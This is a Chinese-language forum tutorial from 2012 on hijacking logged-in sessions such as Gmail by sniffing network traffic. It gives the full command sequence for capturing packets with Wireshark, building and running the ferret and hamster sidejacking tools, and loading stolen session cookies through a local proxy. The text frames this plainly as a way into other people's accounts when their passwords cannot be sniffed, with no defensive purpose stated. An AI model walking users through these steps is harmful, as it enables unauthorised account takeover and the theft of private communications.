切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
51 : 中间人攻击 会话劫持[复制链接]
发表于 2012-8-20 23:54:18 | 显示全部楼层 |!read_mode!
某些情况下,我们要嗅探GMAIL 或者其他一些账户时,对方已经登录,我们嗅探不了密码,咋办? 我们可以用会话劫持
首先我们要获取数据包,启动wireshark进行数据报的抓取 选择网卡





等待一段时间后保存包 保存的时候先停止抓包





安装hamster
下载:


  1. root@Dis9Team:~# wget http://www.clshack.it/nopaste/hamster-2.0.0.zip
复制代码



解压缩 进入目录编译


  1. root@Dis9Team:~# cd hamster/build/gcc4
  2. root@Dis9Team:~/hamster/build/gcc4# make
复制代码




还需要编译另外一个:


  1. root@Dis9Team:~# cd /root/
  2. root@Dis9Team:~# cd ferret/build/gcc4
  3. root@Dis9Team:~/ferret/build/gcc4# apt-get install libpcap-dev
  4. root@Dis9Team:~/ferret/build/gcc4# make
复制代码


好了 现在来分析包:
  1. root@Dis9Team:~/ferret/build/gcc4# cd ../../
  2. root@Dis9Team:~/ferret# cd bin/
  3. root@Dis9Team:~/ferret/bin# ls
  4. ferret
  5. root@Dis9Team:~/ferret/bin#
复制代码



分析:


  1. root@Dis9Team:~/ferret/bin# ./ferret -r /root/test
复制代码





吧分析的包复制到HAMSTER的BIN目录


  1. root@Dis9Team:~/ferret/bin# ls
  2. ferret  hamster.txt
  3. root@Dis9Team:~/ferret/bin# mv hamster.txt /root/hamster/bin/
复制代码



现在进行劫持!


  1. root@Dis9Team:~/ferret/bin# cd ../../hamster/bin/
  2. root@Dis9Team:~/hamster/bin# ./hamster
  3. --- HAMPSTER 2.0 side-jacking tool ---
  4. Set browser to use proxy http://127.0.0.1:1234
  5. DEBUG: set_ports_option(1234)
  6. DEBUG: mg_open_listening_port(1234)
  7. Proxy: listening on 127.0.0.1:1234
  8. begining thread
复制代码



设置FIREFOX代理 127.0.0.1:1234





访问

http://localhost:1234/

然后你劫持了他的话会






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 19:35

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部